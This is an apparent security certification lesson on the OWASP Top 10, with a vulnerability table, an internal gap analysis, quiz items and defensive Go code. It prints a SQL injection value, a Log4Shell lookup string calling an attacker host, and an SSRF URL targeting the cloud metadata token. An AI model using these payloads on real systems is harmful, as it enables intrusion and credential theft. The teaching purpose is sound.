Domain 6 · Lesson 3 of 5

OWASP Top 10 (2021)

OWASP Top 10 Web Security Vulnerabilities

Key Change from 2017 — Exam Trap

A01 is NOW Broken Access Control (was #5 in 2017). Injection dropped to A03 (was #1). Memorize the top 3: A01 Access Control → A02 Crypto → A03 Injection.

OWASP Top 10 (2021) — Complete Table

| Rank | Name | Description | TS Risk | Mitigation |
|------|------|-------------|---------|------------|
| A01 | Broken Access Control | Vertical/horizontal privilege escalation — user accesses another user's data or admin functions | Per-lender token bypass in Platform C — Partner A token accessing Partner D data | ABAC on every resource query; server-side enforcement; never trust client-supplied resource IDs |
| A02 | Cryptographic Failures | Missing/weak encryption, deprecated algorithms (MD5, SHA-1, DES), unencrypted PII | Platform A legacy unencrypted PII (caused production shutdown incident) | AES-256-CTR; TLS 1.3; never SHA-1/MD5 for security; audit column-level encryption |
| A03 | Injection | SQL, NoSQL, OS command, LDAP injection — untrusted data sent to an interpreter | Legacy Platform A Java JDBC — potential string concatenation queries | Parameterized queries; prepared statements; input validation at API boundary |
| A04 | Insecure Design | Missing threat modeling; no security requirements in design phase — security as afterthought | New features (Partner C Telco APIs) without security review | STRIDE for each integration; security requirements in sprint definition of done |
| A05 | Security Misconfiguration | Default creds, debug endpoints in prod, verbose errors, open cloud storage (S3/GCS buckets) | Kubernetes misconfiguration, open GCS buckets, debug endpoints left on | Hardened defaults; IaC scanning; Pod Security Standards; no debug endpoints in prod |
| A06 | Vulnerable Components | Log4Shell, CVEs in Go modules, NPM packages — using libraries with known exploits | Platform A uses Java (Log4j?); Go modules need regular audit | govulncheck; Dependabot; Trivy; patch Critical within 48hrs |
| A07 | Auth Failures | Brute force, credential stuffing, no MFA, session fixation, weak token handling | OTP brute force if rate limit bypassed; weak JWT validation | 5/hr OTP rate limit; anti-enumeration; short JWT expiry; alg=RS256 only |
| A08 | Data Integrity Failures | Unsigned software updates, insecure deserialization, CI/CD pipeline attacks | Unsigned Docker images; ArgoCD pipeline as attack surface | cosign image signing; digest pinning; Vault for CI secrets; signed git commits |
| A09 | Logging Failures | No audit trail, no SIEM alerts, blind to active attacks — cannot detect or investigate | Datadog alerts not complete for all critical auth/error events | Full audit trail; Datadog alerts on auth failure rate; Kafka consumer lag monitoring |
| A10 | SSRF | Server fetches attacker-controlled URL — reaches internal services or cloud metadata endpoint | Webhook/URL preview features in Platform C that fetch user-supplied URLs | Allowlist external domains; block 169.254.x.x, 10.x.x.x, 172.16.x.x, 192.168.x.x |

A03 Injection — Parameterized Queries vs Sanitization

Vulnerable — String Concatenation

query = "SELECT * FROM loans WHERE id = " + userInput

If userInput = "1 OR 1=1", returns all records. Classic SQL injection.

Secure — Parameterized Query

db.Query("SELECT * FROM loans WHERE id = ?", userInput)

userInput is treated as data, not SQL. Injection impossible regardless of input value.

Input sanitization alone is NOT sufficient — sanitization can be bypassed with clever encoding. Parameterized queries are the correct primary defense. Sanitization can be an additional layer but not the sole control.

A10 SSRF — What Internal Resources Can an Attacker Reach?

SSRF: an attacker tricks the server into making HTTP requests to a URL the attacker supplies. The server acts as a proxy to internal resources the attacker can't reach directly.

Dangerous Internal Targets

  • 169.254.169.254 — GCP/AWS metadata service (IAM credentials)
  • 10.x.x.x / 172.16.x.x / 192.168.x.x — RFC 1918 internal networks
  • Internal APIs not exposed to internet
  • Kubernetes API server
  • Redis, Memcached without auth

Defense

  • Allowlist: only permit URLs from approved external domains
  • Block private IP ranges in HTTP client
  • Resolve DNS and verify IP before fetching
  • Cloudflare WAF does NOT prevent SSRF (request comes from server side)
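
The code-level defenses above (allowlist, block private ranges in the HTTP client, verify the resolved IP before fetching) can be combined in Go by validating the URL first and then checking the address at dial time. This is an added example, not code from Platform C; the allowlisted host `hooks.partner.example` and all function names are assumptions.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/netip"
	"net/url"
	"syscall"
	"time"
)

// Constructed allowlist; hooks.partner.example is a placeholder domain.
var allowedHosts = map[string]bool{"hooks.partner.example": true}

// isBlockedIP covers loopback, RFC 1918, 169.254.0.0/16 and their IPv6 equivalents.
func isBlockedIP(ip netip.Addr) bool {
	ip = ip.Unmap() // treat ::ffff:10.0.0.1 as 10.0.0.1
	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsMulticast() || ip.IsUnspecified()
}

// validateWebhookURL applies the allowlist before any DNS lookup or connection.
func validateWebhookURL(raw string) error {
	u, err := url.Parse(raw)
	if err != nil || u.Scheme != "https" || u.User != nil {
		return fmt.Errorf("only well-formed https URLs without credentials are accepted")
	}
	if !allowedHosts[u.Hostname()] {
		return fmt.Errorf("host %q is not on the allowlist", u.Hostname())
	}
	return nil
}

// checkDialAddr runs after DNS resolution, on the IP actually being dialed,
// so a name that resolves (or later re-resolves) to an internal IP is refused.
func checkDialAddr(network, address string, _ syscall.RawConn) error {
	ap, err := netip.ParseAddrPort(address)
	if err != nil || isBlockedIP(ap.Addr()) {
		return fmt.Errorf("refusing to dial %s", address)
	}
	return nil
}

// newWebhookClient returns a client whose every outbound connection passes checkDialAddr.
func newWebhookClient() *http.Client {
	d := &net.Dialer{Timeout: 5 * time.Second, Control: checkDialAddr}
	return &http.Client{Timeout: 10 * time.Second, Transport: &http.Transport{DialContext: d.DialContext}}
}

func main() { fmt.Println(validateWebhookURL("http://169.254.169.254/")) }
```

Because the check runs on every connection the transport opens, it also applies to redirect targets.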

Key Terms

Broken Access Control, SQL Injection, SSRF, Insecure Design, Security Misconfiguration, Vulnerable Components, OWASP, Parameterized Query, Horizontal Privilege Escalation, Vertical Privilege Escalation

Exam Tips
  1. OWASP #1 (2021) = Broken Access Control — NOT Injection. Injection is #3. This ranking change is a common exam trap.
  2. SSRF: server makes request on attacker's behalf — can reach internal services (metadata at 169.254.169.254). Cloudflare WAF does NOT block SSRF.
  3. Parameterized queries prevent SQL injection; input sanitization alone is NOT sufficient as the primary defense.
  4. A06 Vulnerable Components = supply chain risk — your code is safe but your dependency isn't. govulncheck catches known CVEs; zero-days in dependencies are undetectable by scanners.
  5. A08 Data Integrity Failures = unsigned software updates can install malware. Includes CI/CD pipeline attacks (SolarWinds attack pattern).

Work Application — Platform C OWASP Top 10 Gap Analysis

A01: Per-lender ABAC validation on every DB query ✓ — but are there automated integration tests proving Partner A cannot see Partner D records? (GAP: write cross-tenant isolation test)

A02: AES-256-CTR in Platform C ✓ — Platform A legacy: column-level encryption audit NEEDED urgently after PII incident

A03: database/sql parameterized queries in Go ✓ — Platform A Java: manual code review of all JDBC calls NEEDED

A04: STRIDE for new integrations? Partner D done — Partner C Telco APIs: security requirements not yet reviewed (GAP)

A05: Pod Security Standards on Platform C namespace? (CHECK — verify Kubernetes PSA enforced)

A06: govulncheck in CI ✓ — Platform A Java Log4j audit NEEDED; Dependabot for NPM frontend?

A07: OTP 5/hr rate limit ✓ anti-enumeration ✓ — JWT alg hardcoded RS256? (VERIFY)

A08: Trivy image scan ✓ — cosign signing? (CHECK — not confirmed)

A09: Datadog alerts for all critical auth events? (AUDIT — define the alert checklist)

A10: Webhook/URL preview features in Platform C? If yes: SSRF validation REQUIRED (REVIEW)

Practice Quiz

Q1. What is the #1 ranking in the OWASP Top 10 2021, and what was it in 2017?

2021 #1 = Broken Access Control (A01). In 2017, Broken Access Control was #5. Injection, which was #1 in 2017, dropped to #3 in 2021.
This ranking change is a high-priority exam topic. The CISSP exam uses the 2021 OWASP Top 10. Broken Access Control moved to #1 because it appears in 94% of applications tested (most prevalent) and has severe business impact — unauthorized access to other users' data, admin functions, or cross-tenant data. Know the top 3: A01 Broken Access Control, A02 Cryptographic Failures, A03 Injection.

Q2. Why are parameterized queries more effective than input sanitization for preventing SQL injection?

Parameterized queries structurally separate SQL code from data — user input is never parsed as SQL regardless of what it contains. Input sanitization attempts to filter out dangerous characters but can be bypassed through encoding tricks, alternative character sets, or edge cases not anticipated by the filter.
SQL injection is fundamentally about the database interpreter treating user data as code. Parameterized queries solve this at the structural level — the database receives the query structure and the data separately, so "1 OR 1=1" is treated as the literal string "1 OR 1=1", not SQL to execute. Sanitization is playing whack-a-mole with malicious input patterns. It can complement parameterized queries but should never be the primary defense.

Q3. A Platform C feature allows admins to configure a webhook URL. An attacker configures it to http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token. What attack is this and what can the attacker obtain?

SSRF (Server-Side Request Forgery). The attacker obtains the GCP service account's OAuth access token from the instance metadata service — this token can be used to make authenticated API calls to GCP services with the permissions of the compromised service account (potentially full GCS, BigQuery, or GKE access).
169.254.169.254 is the link-local metadata endpoint in AWS, GCP, and Azure. It returns credentials, project IDs, and other sensitive configuration for the cloud instance. SSRF to this endpoint is one of the most impactful cloud attacks — it effectively gives the attacker the cloud credentials of the server. Defense: validate and allowlist URLs before fetching; block private IP ranges including 169.254.0.0/16 in the HTTP client configuration.

Q4. Platform A legacy Java service uses Log4j 2.14.0. What OWASP category applies, and what must be done?

A06 Vulnerable and Outdated Components. Log4j 2.14.0 contains Log4Shell (CVE-2021-44228, CVSS 10.0 Critical). This must be remediated within 24–48 hours — upgrade to Log4j 2.17.1+ or replace with Logback/SLF4J. This is a Critical emergency, not a sprint backlog item.
Log4Shell was discoverable by any internet-connected system using a single malicious lookup like "${jndi:ldap://attacker.com/a}". Log4j 2.14.0 is vulnerable. The remediation: upgrade to 2.17.1+ (or 2.12.4 for Java 7). If upgrade takes time, apply the workaround: set LOG4J_FORMAT_MSG_NO_LOOKUPS=true. For Platform A: this is a CVSS 10 finding, triggering immediate incident response, not a routine patch. Consider taking Platform A offline if it's internet-facing until patched.

Q5. A Partner E customer changes their loan application URL from /api/loans/12345 to /api/loans/12346 and gets another customer's data. Which OWASP category is this, and is it horizontal or vertical privilege escalation?

A01 Broken Access Control. This is horizontal privilege escalation — the customer stays at the same privilege level (customer) but accesses another customer's data by manipulating a resource identifier (IDOR — Insecure Direct Object Reference).
Horizontal = same role, different user's data (customer accessing another customer's loan). Vertical = lower role accessing higher privilege functions (customer accessing admin endpoints). Both are A01. The fix: server-side authorization check on every resource access — "does this authenticated user own loan 12346?" Never trust client-supplied resource IDs without a server-side ownership/authorization check. This is ABAC enforcement at the row level.
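
The ownership check described in the Q5 answer, together with the cross-tenant case from the A01 gap analysis, can be written as a deny-by-default lookup. This is an added example, not code from Platform C; the `Loan` and `Principal` types, the role names, and the sample records are assumptions, and returning the same error for "denied" and "missing" is a design choice of this sketch.

```go
package main

import (
	"errors"
	"fmt"
)

// Loan, Principal and the sample records are constructed for this example.
type Loan struct{ ID, OwnerID, LenderID string }

// Principal comes from the verified session or token, never from the request.
type Principal struct{ UserID, LenderID, Role string }

var ErrNotFound = errors.New("loan not found")

var loans = map[string]Loan{
	"12345": {"12345", "cust-1", "partner-a"},
	"12346": {"12346", "cust-2", "partner-a"},
	"20001": {"20001", "cust-9", "partner-d"},
}

// canRead is deny-by-default: the tenant must match first, then the role
// decides how much of that tenant's data is visible.
func canRead(p Principal, l Loan) bool {
	if p.LenderID == "" || p.LenderID != l.LenderID {
		return false // cross-tenant: Partner A principal, Partner D record
	}
	switch p.Role {
	case "lender_admin":
		return true // any loan, but only inside the admin's own tenant
	case "customer":
		return p.UserID != "" && p.UserID == l.OwnerID // own loans only
	}
	return false // unknown role
}

// getLoan is what a handler for /api/loans/{id} would call with the path ID.
// A denied lookup returns the same error as a missing ID, so responses do not
// reveal which loan IDs exist.
func getLoan(p Principal, id string) (Loan, error) {
	l, ok := loans[id]
	if !ok || !canRead(p, l) {
		return Loan{}, ErrNotFound
	}
	return l, nil
}

func main() {
	_, err := getLoan(Principal{"cust-1", "partner-a", "customer"}, "12346")
	fmt.Println(err)
}
```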